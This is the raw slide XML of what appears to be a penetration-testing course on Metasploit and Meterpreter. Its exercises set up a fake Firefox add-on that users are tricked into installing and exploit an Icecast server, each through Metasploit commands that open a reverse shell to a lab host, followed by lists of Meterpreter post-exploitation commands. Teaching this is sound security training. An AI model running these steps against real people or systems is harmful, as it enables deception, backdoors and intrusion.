                    <a:cs typeface="Times New Roman"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1100">
                  <a:effectLst/>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Text Box 2"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="58522"/>
                <a:ext cx="896620" cy="51181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b="1">
                    <a:effectLst/>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="SimSun"/>
                    <a:cs typeface="Times New Roman"/>
                  </a:rPr>
                  <a:t>DMZ System</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1100">
                  <a:effectLst/>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman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558138" y="58522"/>
                <a:ext cx="833755" cy="3581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400" b="1">
                    <a:effectLst/>
                    <a:ea typeface="SimSun"/>
                    <a:cs typeface="Times New Roman"/>
                  </a:rPr>
                  <a:t>Firewall</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1100">
                  <a:effectLst/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="13" name="Straight Connector 12"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="1280160" y="204826"/>
                <a:ext cx="276962" cy="14606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" name="Curved Connector 7"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="1250899" y="475488"/>
              <a:ext cx="1062420" cy="1007612"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 100949"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="1905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urved Connector 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1302106" y="1572768"/>
              <a:ext cx="658424" cy="526491"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 102175"/>
              </a:avLst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82914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Exercise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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US" dirty="0"/>
              <a:t>Create a fake </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> extension with Metasploit that creates a backdoor from the victim system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trick users into installing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>add-on  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Break </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>into the Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; use exploit/multi/browser/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>firefox_xpi_bootstrapped_addon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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>firefox_xpi_bootstrapped_addon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) &gt; show option</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>firefox_xpi_bootstrapped_addon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) &gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addonname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xxxxx</a:t>
            </a:r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631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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>firefox_xpi_bootstrapped_addon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) &gt; set SRVHOST 10.144.30.xx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>firefox_xpi_bootstrapped_addon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) &gt; set SRVPORT 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>firefox_xpi_bootstrapped_addon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) &gt; set URIPATH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xxxx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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>firefox_xpi_bootstrapped_addon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) &gt; set LHOST 10.144.30.xx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>firefox_xpi_bootstrapped_addon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) &gt; set payload windows/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp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 err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>firefox_xpi_bootstrapped_addon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) &gt; exploit </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1369856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Social </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Engineering Attack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Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the exploit is started.  Our fake add-on is available at, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://10.144.30.xx/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>xxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once victim visit the link, it will ask user to install the add-on in order to view the page.  Once user install the add-on, the system will be backdoor-ed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3480265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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>meterpreter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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interpreter = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Metasploit payload that acts as a specialized shell running inside the memory of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-exploited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consists of a series of DLLs injected into the process's memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>separate process created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098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Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>: Functionality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Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>base Commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>? / help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> : Display a help menu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>quit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> : Quit the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Show name, OS type </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>shutdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>reboot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: read or write to the registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2289718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File System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b="1" dirty="0" smtClean="0"/>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: navigate directory structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>lcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: change local directories on attacker machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>getwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Show the current working directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: List the directory contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Display a file's contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Move a file to or from the machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rmdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Make or remove directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Edit a file using a vi-like interface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46106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Process Commands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en-US" sz="5100" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>getpid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t>– returns the process ID that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t> is running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0" smtClean="0"/>
              <a:t>inside</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="5100" b="1" dirty="0" err="1"/>
              <a:t>gtuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t>- returns the process ID that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t> is running with</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="5100" b="1" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t>- process list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="5100" b="1" dirty="0"/>
              <a:t>kill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t>- Terminate a process</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="5100" b="1" dirty="0"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t>- run a given program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="5100" b="1" dirty="0"/>
              <a:t>migrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t>- jump to a given destination process ID </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t>Target process must have the same or lesser privileges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t>May be a more stable process</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t>When inside the process, can access any files that it has a lock on</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/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endParaRPr lang="en-US" u="sng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023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Network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err="1" smtClean="0"/>
              <a:t>ìpconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Show interface information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>portfwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> :Forward packets for a local TCP port to another system on a different TCP port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>route</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Manage the systems' routing table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="462110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Target Machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Console</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Interface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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> offers a couple of features associated with the target machine’s console user interface:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show how long the user at the console has been idle    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>idletime</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Turn on or off user input devices:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uictl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [enable/disable] [keyboard/mouse]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can really mess with a user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dangerous for use in most penetration tests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Numerous other functionally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911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Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Exercise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In this exercise, we will exploit a vulnerable version of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Icecast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> service for Windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And inject a reverse shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Icecast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a free streaming multimedia server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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146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Risks of Exploitation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smtClean="0"/>
              <a:t>System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>crash </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System crash </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System stability  impacted </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System integrity  violated </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data  exposure  with  legal  ramifications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>because  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of  these  concerns,  verify  that  exploitation  is allowed  by  Rules  of  Engagement </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And...  double  check  for  a  given  system  whether  it  is  in  scope </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also,  understand  the  probabilistic  nature  of  exploit  success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31822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./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfconsole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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; show exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; exploits/windows/http/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>icecast_header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err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>icecast_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&gt; windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp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err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>icecast_header</a:t>
            </a:r>
            <a:r>
